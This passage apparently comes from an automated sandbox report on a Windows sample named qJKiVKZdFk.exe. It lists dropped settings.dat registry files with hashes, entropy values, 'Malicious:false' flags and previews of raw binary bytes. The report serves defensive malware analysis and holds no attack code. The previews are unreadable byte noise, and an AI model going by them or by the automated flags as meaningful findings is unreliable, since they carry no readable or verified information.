                                                                                                                                      Preview:....8.F.c..X....).R"...5[...q1.oXx./.;..`?f /._z.\.,.;.S......Pjv.>...p|..N.-.#d.J..>.....|....A P.*...K.7.q...:.]..mg....E<........p.....g.l..x.A.r.6g.!.K(....L...r..../....p...E.{.G..D.KH.d#Y..1.r......CJF...7.8H(%S...K=Q...1...G.......?.}..g..x9..w.n....go.`H...ia.t..H.].....@..<..x......=x...........:1...v.b0.c..c=.....35.++W...z/....F.....?<..{<l..[..JY.D8..gt..l5.?>=...j..GG7,..4..A....J.?.>@....<....H*..!..z....<;....paI....>XZ;....9'..m...W...).G^..{.Dl...p`G.X..T.=D.=...E....Hn.I.BN.j....}.%..b....pW.|....,...Z/.*......=y..l...0....$[~....|K_.q...W..f{...)&.=....^......d.:sTW..).....P.#...3.T.tE;.sn.#..a.c.0sf).`z.[.,.i#....*\8.D...M......''............t..pHT!v..4og" ...`....L.Pf..%..TS.a......[v.p.M..;Ok<.........H... .5...j8`..2.F...j..e!.7...-..i.!..?m.C.hIs.B.5(...f...........v.Ej<..o.%...N@.#..V.....1:.p.:T....K.}^.GNy.....P0.. E.6.s...ED^..{..7......S..CnI.$...*..9n.J7A.......:+.(.'.~.oG(..F=j...C79I04..p.2n\

                                                                                                                                      C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978468670162599
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:AosFGXuXu04om5DAh2MgU5Y0sbX1INy9LK62WVptT:DsFGXg65DQpnWbuNydjT
                                                                                                                                      MD5:1A01D84A5E65AB8C874B5D4B9B7D5053
                                                                                                                                      SHA1:4FE5C5E44A6C9D35B21EC09679039224FAC533D8
                                                                                                                                      SHA-256:7393A0D1A3A4198BB858BFB9EC036D5AEF11F915736E8EE6D86E5813C49EDD86
                                                                                                                                      SHA-512:A73077F6CBCFA434385FA5FEEC05251C98B01742D2C19315B00E30B1F455FEE8B008BAF6C907849412CC426939765CD4C7F26EAA295E538BC78CD275E6BA678E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.....,..$....a.c.K...T...Y.L.=.B..eE..!.xF.5.u~.F$..Z..........:.$...?..u..<"|...*...0C\..g...4Pv!.._..>......04.b..N..G...o|.M..[D...Qk.....[jt.z;...rg.p .3g..`....S.Z...rb...f...].%B..<\...O.k....}8...-...y....7..mO....Fwv...N..............e.(.pX..&..L}.o...0.....?.q..." .@U;.2|3.).(..~.....+.....[1J.P.-....).wa..5c.....rU..R.)L...3.b#V.Z......x....1+..d.>...0.}.6Lw..C<..)LugUus7....c......02:[`..+..6s.FW.z\V5.<.%To..j&..W....]*.#.../o88z5.H...0.}..[.k.?,).:M#..5.......6...B2.4..~...n...nn.7..'-.....%...?5...Z)..E...D..n........!....)R.*c./$FW....P.1..3..r. .z..D....v.9GV....M.(...."...W..........:3.`.....N.....+..%.u.g..@z.PTAp.CN......W..]........r.^0.l.S.......nI.~.....JD..3....3..T.-.........^...U...d..S.~I}j.9.q...}.,Q..[.....XU....... `..t 7..I[.......X...mk...a.w.!.]..`_..7.NtqN...l /v|^..!.-gL.@..H...$L.i.z[0g...T..8.#...z.,..J..fV..(..~.d....0.........2u...v...8....l.........#6V....@c...2..<.......T.....\...y.y..^.m....

                                                                                                                                      C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978061143300296
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:2AMpjX2vMwR/oDvYb1imu5XFEQQS49s3s1zk4a4mDwjmxXyi595r7:29XjBYb1ihVE2sm4jjgbH1
                                                                                                                                      MD5:771F3842040EC0B3407E0AC95A4DB948
                                                                                                                                      SHA1:D5AEDD8E8EFC89D60A6DA7367006DAB523F55FC4
                                                                                                                                      SHA-256:DDD408E018957CA9620F44A23713FCAEB30AA3F3EA3ACC6A1C15330B68E6AB66
                                                                                                                                      SHA-512:6773DF0234DAB47C1EB3B44094359C3E4FCD18B3663FAF0FEED676174D5D65D672E35FB38B251285029D9257A05F7510ECC57FD07417EBBEFAA885EC08EE24DC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...iE..t.l.3fu.#..G...y.}"......q?..H.'_*.nM..^.a.".Z.....`.u.a..6.o*.L.j.;.23p1..'.W.G.&x.J..Z..k ..u.g.e..5.?...xg...!.b{...f.e.y=...HrAL.K=7..B..^D.. ./....\$..O5%..MUt..c.~<g..ls7."...Vxn.......H.........#.(d.y.opU....o....Y...J.5...x..6...6.{.n.%b..:......d.7.Wt.^|...=C.....H........o...R.....<...C.`..0.E!..'>....f?.=........(.)..,..KrV.[.(.7..g<&`.!4...c.Z'.C...0....a9..v...0}......)...%.XOf....T...i......J.JEG7n......C.G.^#..UE..1..+.7A_.].>g&.."FZ..3I....r.4wgh...+p.Z.!?OX..$....x..zk..<....<..........@<...zE....U..f....t...v..\/z~.?....I....S.m.Ld..i...*b..F.n....P...E.%'3...$a\....f......D!.Rbt.Mhi.6)..9...R.I.....;..Q......l.....[w..a........@..`z.T.@!....d.qv....I'..!.....i.J..X..B\z..[.W^4.[*S$P*]%.~.qCm.{..K...K.U.~V..|.5.R>.5~m.L..I..#:..3.Qo |.....[...O.{/...[..J..dq.;1.....0C..t_..[RAo<.&Q.......Gt...)....]S.A....q.>lL%....LL..I.V....."GU.xt.fx^O.t.F....:.N..t.<..}..\..'.".7@..&.O.R..u.......d.{...=3.s......a...fV..Q..^

                                                                                                                                      C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978508872035781
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:1w9K/dc12X8vZ80LL24KrScV2BHDekvu+gE2Hi8vXf8:O0a1DvZ8+LcXkD1t2Hi8n8
                                                                                                                                      MD5:3B0124CD532908C4C4733B531F865789
                                                                                                                                      SHA1:357BE0CA39A8CD0874383FC112CCC579B57A63C4
                                                                                                                                      SHA-256:5DB39EC78A1522084DC247AC4136A399ED79381F5230BE0606FBD9E834BC101F
                                                                                                                                      SHA-512:C46F06F772727A2340909F2243047B5AFFAB14C7D996C81409157BE84C8E71C209A6724347F719635656DED24A3F72C8202EA1A4B2E37700B93ED64173C5BE98
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.....X..d....E..6...u?X.....$IBN..g...i.U..EhE......`.&.P..J.r.m.cI,Y....`.!)V........S.:h...;...........P....-a...f..i......L....'bMv&*.......P...a..X...1.K....$...b9._.s.k.....F..CR..7.2.=.i...8+.u.3..#?.C..<.k..^....N.v.d.P..q..v...h..Yk.S...a...c?..5.K.<....Q......ed.;...|1.*..E[,..>..db...Ao@l]..t........`"=.../..^............B*.~.&AJ/R..#A.)....o...M..z... m..C`:..{.Y.uMT.~......{..'v.}9..d...I.....u..W.<B@B/..3p..*{....+l..$T`z.eY.C.:d.^.0t.....X#...<..P.Q.........V..p|.mH.D..+BY..8....:.........L.X..]..........\.....'.....p. ......3..,0nd-...6.8.r!F...{....W..|.N.gv..l.. .o.;.h!...v.e s.........T..u...a"@.q....$...}.J&/....F..D#.t..Bm.o....3.Z..Gm..3x..~./o!...,..'..Q.._.|.2z..E..7.Z.....=...&"@.;.r~zj..;..U..J...)...`.}W...<..g@4....i....5.a.t.~..Y...+t.]b@p...#.X`...?.J.N.|.......:.....G.Aj9.!...^.`iG...N`u6.7.o..*.F$...I.D.Z"wz...z.......:.w..q.a.w..Q...Mp.8.H....`.Y..c..|M.F.i....W. T9U.......>...M....x..!j.\.L...w+.|

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.974458823615938
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:h3XN7B0RK8PV7xN0Re5K7RzthXAI/P8ZF:fwK8PVdm05ARzMI/SF
                                                                                                                                      MD5:380BC269A0D8C368794957756B3B6A33
                                                                                                                                      SHA1:F86920CED1958187A2AE7C5D75BC6FFDF5993201
                                                                                                                                      SHA-256:70CE5AF565C11BD71FE75BAED1FD94302DDE98A30FAD901881002AFB5E13CEBF
                                                                                                                                      SHA-512:EEF3B47957C0B9E98D67445BF46EF94B1167D92326291B492D136EEC4365B29952913B73EA896A9F6DC17D5270DCB6AB35FA679EC9BB743250439D4E033116E0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.!:.G......fRQ.A..A.Hn].ik.]1P.......Htp..m...{O.j{..........$.....B....$..$.....a...e.c PC........v~Z...{.H9r.^.2.+*ce.........w.L....}......c...1``S.......`......I^|..h.B.w.....&^X._....[..\.+....Y.*.M."a6F...g1Kd......0...I;.E.XK:..8)..B....A...............$..q8J.,r...qf._.`k.@.~....D^<.p.5..e.A..[......B.4Y.....g...m."r`...S._k.j_.... .......fz.........@.d=VY)..y...=..8<.=...y|S.:t .....S?.2_....../|D?.dZ.X.....{.Gi....Y?=...E..'$..0.6...2....m.P....k.9.s.:.......i.=.5.....RC...1#n.N=..J^.....f..+.tr.]..;.V.a......w5...uB.........P.i(.V...i.e. oC.Z..0..O.....U..kM!...."M.....R.x...S(.g...^.\.i6.=.j...@}.hu4..S...".....^..H..o_.Q.....!q.9P....I.F....RD..l.k4....M`..1N$E.t.$.<.+~m...x........iC...!...?......(................r.fL_....S.~...$.1.On8..\F.6T)...0.......b.?h..r..M.'...t.f.(2.C_.Ud....\..z.f. .^9Bs......4M..cd.R...c.+z...j.qS;jx..b..I..c5\.=..l...|Dvy7...+Hl.U1f.......W.-=XG..<".N..W<Ud..]v...3..:...j.+?u.;.i....w

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9790116584857245
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:U87Q+MfkV/iBhgVrAnNufjx/YXX0F7vFqngXxLGh:U8dZ/ikmIjxg0F7vFKghLGh
                                                                                                                                      MD5:04636DBB9C98312030F89BB82076BFE3
                                                                                                                                      SHA1:24F5ADF175A0DEC4834C5FA7A41657DE3CA34053
                                                                                                                                      SHA-256:EA548E0DD016E1D0A7FAC3EB51B263D93AD183B297FCE265FFA78D12A1079CE3
                                                                                                                                      SHA-512:670B30A16882D007A50DB7D4D6BD6D0CBE4F9121EF29E8558EB95E111D62D93BD027C1F04E69741F2FC3B466D9E3DA187609FC9E67F52B9D75642B7255499EDD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...9;P. )."C&...Q........;.iIL.2Q.z.6IZ-;..x!.D..[.TB...S.Q.X.u..A..m....@.h...H....S...mtq>.U04..|6.6...Bz..].dg}..]00.&....1Q.w=. ...'.!Z#.o.0...~..K...LE...|.._GW>,....E...,........x..Z{.J.t..=..lC...;.T.....`.p.^.*...w.=M.D..S..)~.<5IE.n"HU3..2......x..+'X..Tn.h...3..K.0{..Po.x2../V".<\-..\[..}.v.AS.pGa4..NN..{.+.q....P...].?..4.RN.....p..'..$...V.4H.......q..Y$.*E.j..1..h>.y.<....p....V.l.%BV....aB......l}.B.A.i6...?..j..A....&$h..X.C.........E.=s!1.:.w..C.+l..[..V/.,.....D.E.QC...$.$.A....fu....;......1U...Y.'e..H.....@.7..{{T..K..V.[..S.+....7t:Z..f!] .."...l..]............".q........8l\..-3QI..43Dc.o....i.4..C..h3....e.i....\6w...(M</t...&.....N.@..(........BM............r=.&7...x.m......{..0....I.#Q...3..U...8t..oS...!...z;.i.!.[..D....^?.".k..Km,.~.J._$*=[D.......^.Pn.V........Q...Y.,.. ...2..C..F....Cu..a<.....+...x..:....O..S.zVN}y.."l..~L.A..!..N.K.e....zZ...w..G........I.:...X....bM..{.$=.UzlV....8...w.z.4...?.....y

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976869720141004
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:kT4FOVBZq95RYsnbkn8FwfTx5ZXUxfJpAq2K2dr:kT4sVszHnbrQTxcnKq2nx
                                                                                                                                      MD5:406183B63A875F8D67576F5B5B616E3B
                                                                                                                                      SHA1:CDE656E959C375726AED4A6D8CC1F5D4065F2E50
                                                                                                                                      SHA-256:B38603C7837478D2450B284B8AA46D33D00866BB021E72DE3277BE62021E1B7B
                                                                                                                                      SHA-512:5E976C5F9453DA476AAEAF0234FA8560229FA666D99D77D689F1450007C8CD916ACEB5FD394FC6A9818090F45BE8ED41CDE84A77EAC720F7DC03D1BF444B7F17
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...y.[.......jN.z....X.v%c....~..'2..z....4[P!l.2.5:.=x}u".(gk...-=..4..-..H4....>...j....5I6...n].%..I@....Ho.G.....RR..x."..%r..<_......q...M2xAch.pf..R..4...S..c2l+O.ef.Ngx......8&..}.....m^.....x.8...s..l.[.uK.................J.'...G..k.f....?....)....I=......-MP...gZ...$.d...~.......bI.....1.r.l.i<(E.0...AQ.xx...9+/...B..^...>/-Y.........v..~.B=....*....qFA.g6.{.g.A^.....@I.9k...0R4+H"..-.gv....K...;..m.....e....~..OK.........'...z-F.JOD.`...O...O8...9d.zI..q|.%.u.d....O.{.fS.J{..y..N{.._.1..{...;.S...D..C..Y.B...;.....8..0.....c$e+.v$2:..@'J...%'.e.......,..0....+U...'....mb......tX.&\^..QC.....u.t.-X..}..V.1..'...h\SCl.._.A.(..&..C.'...d..R..'.;.9{.5....4...K.x#........[6...q}.U..Y6....V...5r.!*Rv.vYM..... .F;.R..`............&...#.x.:.._._....B..J~.k.s...v=.;.q..J...u....AxY.9....C.M.g....O..?'.Q.).R.F..+.-.......s/...LM..Z`.*...g..6#......m#P.N...$.>.r$Syq...D.E..jH.<....R.i....8.R._...n.......n...*z:....=*(.cp.....@.l...I!G.g.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.975911136064438
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:zVG6eHwcH9vf+4zXxnycehy3YtsNhYkxZ9rHzfyh+HtMHoPy60:5G6eLHF7zXLoyI1wZdHOINMey60
                                                                                                                                      MD5:F049C762DAD0FE585BA5100606D2103A
                                                                                                                                      SHA1:7073C332CE5C3660D5389A3F1C0AE5B49EA7EEA7
                                                                                                                                      SHA-256:968EBF173049FE2FA2E037E81689C6FE693614D6A1C65DAEE2729D2AA633EEBC
                                                                                                                                      SHA-512:25B3D4E09A2A347EFF7761744F2FF742DCE7A875F9E753A299BF28871F76DF5047515D63C75D4465E29C7D0B77163DA3020FADE5C4B9672AB7374CAF0CE1114B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.O."..Ub...97.w.#.wq3..q,.....G2...1.d....K.$.q........_.&ps.G....r.....H.)j.L]z....1...x.m..$Tc..\.|e.....F....9...\.Q..a.z...!.r...... !.n....E..R(xUC_MbsoU.pn.{V\I...f...f....].B......h.u.P.~.Q..AE.q....K.V.0....[rh.*^.?I.c.7......le$s...kQ...P1..F-. ....Z:.F.g...s-.}d..+.M.......z..D=9`.7~AQ.!....$\.'@?.c.......6.h.1...h......Z..J....i...aNr~..W^"../Xl.a..{... ..o..q.#2.........&..b..t.W...=...4......J\.._#f......M%.9...S...Q.[.......%4...6.,..Z..`M.@Y..F'.U1..7....K.\<.....7w..L......i.b.\B."...:Fw.-...~..T.~.f..6F~..~.5.=i....q....].;Q.....B.VJ@.......|...@$..:._.;....4N......R._e.A..&n.S=.......3./XOFP...,[.U.fKOW..C...X...S.=..t....i0mD0h.A.A1#r'Z.X'}.Qy..c...5.........@.y...@..r ....(..k...g......#R..P.0=..,..,."....3.y,...s).i\|...>...wT.o.0...nwET..Y..K\."*.$.=.bs.n..jlk.3............q../.#.xk...../6.."..._.."@....B....RE...N..2j4...-h.L...U.T.#..va.n)T..wH(...L.J.)q.L...C.....A9..G..3q.-Aqf..v~...o...lc.m!.C..[..X.I.6.A... O4=.+.8.L..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978776964043097
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:8uLy50U8ki3GlrzxZ32CQ2sbIQs/BLmPvH+7EvX+TQvf3lFHpRrnjd44/mTgLOXG:wYWlrtZyfCIdv53lZnp44OpwRXZP00
                                                                                                                                      MD5:DBA0D292B8BCAB271E1D7079EC2C6E41
                                                                                                                                      SHA1:4A694CD1C4778CCDDA291BD7EBDB6FD1AE86869D
                                                                                                                                      SHA-256:2BEB5F50BCD869FC95AE26FF962BBCADE98A7A99526CA4816141881B85D9920D
                                                                                                                                      SHA-512:7A82DCF28275F0FCE41193EFCD5380DBD06E590BBA505FBF949D1B6AA084A2A1A1B52668F04206C37A6ECC2E01F8C23371B03C31C10A60EAB310AE0BCC74BFDA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..M.&.F.9.y*..xCzG...r..D@{...... ..r..F!W...-.(z..\d..y.|}.....8<$.@..#.X]k..+.Pc...w....@...(|...G....T.[.........So...S....PR.}.e..K..wN.)eJ.......!65L....K..@.{......W...xQ.J.=gh.,...(>....8o8..RB.....`..r..........s..a...2....E.C...k.....L=.J,z:.+....).x...X..b.c...8.-hY..I....I..'......G._..L..9(M.............<...v)2dY.3.rr..:...Co.0^.......!EG.J..x.........,..-.Q_D.'Z..l..gU\.(..c...=]E].H&c.I..m..e._-Jn....y.o...p....P...?^F.-...+yC.S....09.....U0~....>RO.\...*Kn....~.I.In....i.0._.._...SV.{r..[4Z..#..dy...YLX..F>..?.w..V@......E.N.|t...oo..p.....J..,.+z..J.q`...a.s..9.$...D..d..W..,....)4.:Qq_..1.....LA.W.s.[.Cd&e..#w...m.&G.....zj-m..Mk.9..Qq9(.5....^../...s..a.A....x.Y.<2........"......Cg...h.z...&.v..6..5.we.B..5.P..|J.s..&xB.Z......^.Iq.07<.W.R.6..WNGbl.3<..9......`.?..@.-25......5.-.C.......i..#`.i....h../....H.1.0.s..6...J.r._..........&...K..+V..,.n<.........@!...h....$.u...v}.|...n..k#6..*...9..i...AN....

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977669149702758
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:kYkZkhLHXoeEipb2Co+zzH/Bap1yO3ESujCT09Is+Nj:dkZkhr4ipb2CB/KyOUVuzxj
                                                                                                                                      MD5:FBDAD1433B9EE90F590BF262837A8728
                                                                                                                                      SHA1:347AAC5F64BAFCB86B63C1C3948CEDD509EB270B
                                                                                                                                      SHA-256:1DC5322B962E8F4A1120CCD6E5668045979D79F88DF20795F1BAEF725A7B8325
                                                                                                                                      SHA-512:308D2DA852358070E8AACD0954FC42F910BC669B2244D94F2B90DA11393E3402FEA0C9FE143DF0C40171360E71BD15E7BB88ED145E4B4936823D1B5E995AE88B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.G....*:x....N6HY.f..n....=SC..Y.....T..L.dN.ki.....y.m.....V.:OP?\m.Q]..s.=].....K...\.........?=!._J.S.e......,..QoL2.i}....$..GJ=.....b..,z.i.*.-c.....1...4q...GF.<~..H.,......"...YpU7JI*R.....N.....[R..."..I.>.;..K[O.C0.}..7.F..$x\'Q.+..dK.......!.K.,.xG...5'.dk..O..b...d..V.....&P...._.|I._...-|C.MusO.1...............[tJ..6C.Z.#.C...0..\..iZ.....e.P.~..W..n.)....^9.`.)Ea........6w .....J..T.9K6.I..=./.[.}q".....x..;..R.zl.;......3...d.dx...j.lk......*.......:<.8........>....;......I...P(.=H...&....%n.h}..{.9.C......e.d..Qn'.|...y.......$...'...y...r...m..%.ld.{hgr8..+;.a.L..$....L.RBS.)..Y.%...8.S~Y..5.tqM.BMA".Xw`:.~w.....HR ]..........m....e.v.*oRKp....@......BJk....,.<.1..vX...L{n...Q..O....D..a.E.9Y..=.].....E.s.........M..?.xi1...YH...l..l.g-..5.|0..m%!AG/.......j.W...m.u..Rq..?R..1.x..y..7..........{u.K.94i..A.zt..T<...>...L.6~....vu_......tk..0k.....N..+T..$.........[..&,..6..w.E...4X..E.^.V..8.g..B........Q.J....2

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978062822478387
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:1slv+yTDwqBgXng5yi3C8QkErPzvHQpJqO+aVbrmRaOtR5FfI5yYHnW:1sZ+kD98Ti3CBzD7+/tBtnW
                                                                                                                                      MD5:DD2EF61967B05D13157DEE7A23194439
                                                                                                                                      SHA1:1B4562A515718F16981540DD3693B18569230773
                                                                                                                                      SHA-256:8C3B4ECB3A71157D21A1F857E5113F6C6A645A774E135BDE337C81C8EC2375DF
                                                                                                                                      SHA-512:6EC356A2742D497F38FCF1960B5CDF8C7F93EA6FCA3032207B82FEDEEEA4BB67B3E767ABC9BC10122415970A069B173CA461CF3797228F23FBF14DFD0A14192B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.Bk :hB..SH....E9.fP.....n..N.h......."O........G...P:....Y8*.{.....J...Ca....x....e..Q;...~+p$....?....2..U....%....h.......'3U5.>........p..~..#*"v.V2 .E.U.,..5?dtk`{.O.#qe..9*.x.^....8P.....#a.E.....[..b.[d&...-..|*...n.].]j..>.9...[...0..<..v...ir+.Y$.P..%..c...L._.(..mzG/r.A../.H.S.i.kIg.t....B.....~#K..4..+...f<.5...../1.7.%..x6.....D....\/.g....X....,i+p0..im..fc....._n.o..r...9,7..;.C.......%..e;..7..X.......}...8"........>.....n..O>.....nBI`.x...f....A^..1.}u.jn..I..O. ..&.$.s.Y.>..r?.D......Dh....j......(p...._...q.........m.9.. .~!..$.:...m...l..../.JE.6$"O......t).m.......qr.Q.........A......z.*._...;Y....4.....n..).1`......-..m.V....o!|%..[Y.eK...H.U.......Z..../7.Cb.\v~8.......P..H..'a.$?.P........_V.T..J%.:..%.....$.8..<.\....o.V.A..E><ycU%...~.@.8.C..r.{.......)..&2r.6.$......c$.Vw#Jm:.<..s.;uX...r....I..#K..U.(...h..r&I....!..O.4U.........Cu.$....=.x.@_..>.x.}M.....McH...a....]..8+3.........B..)z-..LN...ma0...B*?...

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976895234718322
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:8z+KRjVyo+Dj84WqppOtG6KSmI3LevmQD/3E/T5bDA9mv:8Vi0iavNFL4D38T5bDWmv
                                                                                                                                      MD5:805F96D78CE21BA68067E3A07443410E
                                                                                                                                      SHA1:A1434F00D657D3EC5878B251130F41D21275EBEF
                                                                                                                                      SHA-256:C2D31900A1782F725DCB54344541464EF15413BD7D6E3C5B016B194BBC7DBA3E
                                                                                                                                      SHA-512:27974B6AE717436F1E18EC9CFE9DBB046181D067CA629D5E428645477005AD3820F2D87262D2795E69F6BB9DFA38D6941DF8706468482D003E18F31050FE3D57
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....\....t5h..L).<.|z.......^..........<.4HA..A#.5. 51o..xe..A%.u.A..^......9. VD3.......d....&..@T.....o..7/........PZ..5...D.?J.?..U.D..oO5.....(3b....).).hG...o.p.Bz..s.[..`.}...eT!(4|....8dz..!.p....8p.hlP..r.V......)E..DF.......).d..;...`<q........[.SZ.g.. ..i.....-D.8I..>a..:.....w.....!....n<SC..........n.?..Y..G.-.....w......U.W.{..B..S.x.......=.q...f.y..e-n6..'.}q..=..7.0...b.i...b.9.=.?...*.^..jg+.6.&......8M..\.:L6..B...CqC...C...%........,..D=.......S).!jI.P$_.pL....De.0.\J......7(.F.K.f'..v..1l..d.W.....f..'........a^;.T}...V....`.~.....Pi.g.......#..&.n....ve<}.Z+....q...Rhr..7)..=B.b...#.K......_;.6...:W../cY..!..n.;D]3..2...ri(......<5.>......q.;.%.FaF...p.......R.].....SD.nf~...$.x..4.T.'n-......%%H..\r?.3Sp.....1...O..a..J....6.!....NW......m...;...@2S..80..~.<.HL.C...U.+.`y.P.....t>.J.......J.2.kf.K....C..pzg..3V0..c..e.)$.b...................dg.......,[.&.."WQ......C..G..Jqa.1.\..,..SU..4.....?...........M.|h

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977630295175919
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:MYTulB5avpxTg1HAE6IfzK3dAC3hC94XuTl1fZmiwx1azLhsUq:MGPpWHAE6ye3dN3S4XGl1fZmn/aY
                                                                                                                                      MD5:3CE87F237033462980930F775B333E50
                                                                                                                                      SHA1:DD3F260FA9AB104ADC7F523C406A5D38100282D3
                                                                                                                                      SHA-256:0993A0D367B3F7C29452F0D8E838B21C426FF965D52A9FFD8CE093E394BEDDE0
                                                                                                                                      SHA-512:FED83CFF3AFDC15F97738D47390AC6738DAB35F3FA3212A87BF839FF7E3C4F8A64A0AA504C58EB7A8E275EEB8CBDFD5E93B0B126DD92E46CB0A99987595CB117
                                                                                                                                      Malicious:false
